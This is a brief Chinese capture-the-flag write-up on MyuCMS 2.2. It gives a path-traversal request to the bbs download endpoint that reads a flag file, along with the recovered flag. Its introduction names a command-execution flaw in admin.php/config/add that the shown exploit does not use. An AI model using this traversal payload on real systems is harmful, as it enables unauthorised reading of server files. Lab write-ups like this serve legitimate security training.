一、题目

 靶标介绍：

MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合，插件，模板，轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.

进入题目：

 exp：

url/index.php/bbs/index/download?url=../../../../../flag&local=1&name

查看flag：

 flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}